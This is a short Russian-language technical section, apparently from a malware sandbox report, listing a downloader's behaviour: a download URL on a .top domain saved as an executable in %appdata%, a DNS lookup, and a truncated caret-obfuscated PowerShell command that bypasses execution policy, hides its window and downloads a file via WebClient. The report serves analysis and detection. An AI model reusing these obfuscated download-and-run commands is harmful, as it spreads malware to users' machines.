Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^w^E^RsheL^L.EX^e^ -^eXE^cUt^ION^PolIc^Y b^Y^PA^ss -^NOpRoFILE^ ^-w^InDOwS^t^Y^LE^ hi^dDE^N (^n^E^W^-oBjE^Ct sY^ST^EM^.N^et.WebC^lien^T^).^D^OW^Nlo^a^d^fi^lE^(^'ht...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "Po^w^E^RsheL^L.EX^e^ -^eXE^cUt^ION^PolIc^Y b^Y^PA^ss -^NOpRoFILE^ ^-w^InDOwS^t^Y^LE^ hi^dDE^N (^n^E^W^-oBjE^Ct sY^ST^EM^.N^et.WebC^lien^T^).^D^OW^Nlo^a^d^fi^lE^(^'ht...' (со скрытым окном)